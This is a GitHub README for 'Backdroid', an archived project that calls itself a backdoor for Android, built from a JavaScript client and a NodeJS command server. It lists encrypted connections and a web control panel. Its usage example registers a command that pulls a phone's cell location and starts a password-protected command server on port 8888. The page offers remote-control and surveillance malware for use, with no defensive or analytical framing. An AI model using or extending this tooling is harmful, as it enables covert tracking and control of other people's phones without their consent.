Skip to content
This repository has been archived by the owner on Oct 27, 2018. It is now read-only.

Latest commit

 

History

History
49 lines (32 loc) · 1.48 KB

README.md

File metadata and controls

49 lines (32 loc) · 1.48 KB

Backdroid v1.0.1 BETA

What is this?

it's a backdoor for Android formed by a client written in JavaScript, with the help of http://onx.ms/, and a server written in NodeJS.

Features

Encrypted connection in AES-256
Web panel control
Very flexible and scalable to add new features

How to install?

Example

var backdroid = require('backdroid');

backdroid.setCommand('location', { provider: 'CELL' }, function(command, value) {

	console.log('[sent]', command, value);

}, function(command, value, response) {

	console.log('[response]', command, value, response);

});

backdroid.createCommandServer({

	password: 'secret',
	password_encryptation: 'secret123',
	
	port: 8888

});